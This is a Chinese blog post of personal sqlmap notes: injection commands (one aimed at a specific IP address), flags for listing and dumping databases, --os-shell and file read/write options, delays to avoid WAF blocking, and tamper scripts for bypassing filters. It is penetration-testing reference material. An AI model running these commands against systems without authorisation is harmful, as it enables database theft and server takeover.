sqlmap-自己比较常用的一些命令 – 作者:darkin

命令太多了,用到的时候再查,写个txt,在工作中不断积累,加深对工具的了解与使用。

=======================================
–random-agent     参数来随机的从./txt/user-agents.txt中获取。默认sqlmap头
–level 3      >=2的时候也会测试HTTP Cookie头的值,>=3的时候会测试User-Agent和HTTP Referer头的值。最高为5,主机头注入
–risk 3       执行测试的风险(0-3,默认为1)risk越高,越慢但是越安全
–batch”命令来自动答复和判断。
–delay   3   避免waf拦截
–proxy-file (指定文件目录)设置多条代理在文件中
–eval每次请求前执行指定的python代码
===========================================
注入方式:
sqlmap  -u “http://www.xx.com?id=x”-p xxx
sqlmap  -r   okay.txt -p username (或者在txt里加上*,或者改为 *)
sqlmap  -u http://xxxxxx   –data=”uname=111&passwd=aaa&submit=Submit”  –param-del=”&” 
sqlmap  -u “http://117.167.136.245:10181/shownews.asp” –cookie “id=170”  –data  (cookie中参数太多使用-p指定,date需要加上)
=============================================
常用参数
–current-db    【获取当前的数据库名
–current-user  【检测当前用户
–dbs         【检测站点包含哪些数据库
–tables -D “db_name”  【获取指定数据库中的表名 -D后接指定的数据库名称
–columns  -T “table_name” -D “db_name”  【获取数据库表中的字段
–dump -C “columns_name1,2” -T “table_name” -D “db_name”  【获取字段的数据内容
–beep    发现sql注入时,发出蜂鸣声。
–is-dba 【判断站点的当前用户是否为数据库管理员
使用–dbms参数用于指定数据库名称
===========================================
–os-cmd,–os-shell 执行任意操作系统命令,执行shell条件:1.网站必须是root权限2.攻击者需要知道网站的绝对路径
–file-read 从数据库服务器中读取文件
–file-write –file-dest 上传文件到数据库服务器
============================================
常用脚本:–tamper “脚本的名称”
base64encode.py    用base64编码替换
space2mssqlhash.py     替换空格
space2comment.py    用/**/代替空格
multiplespaces.py       围绕SQL关键字添加多个空格
charencode.py        url编码
randomcomments.py       用/**/分割sql关键字
versionedmorekeywords.py       注释绕过
halfversionedmorekeywords.py       关键字前加注释

来源:freebuf.com 2021-05-14 10:35:54 by: darkin

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论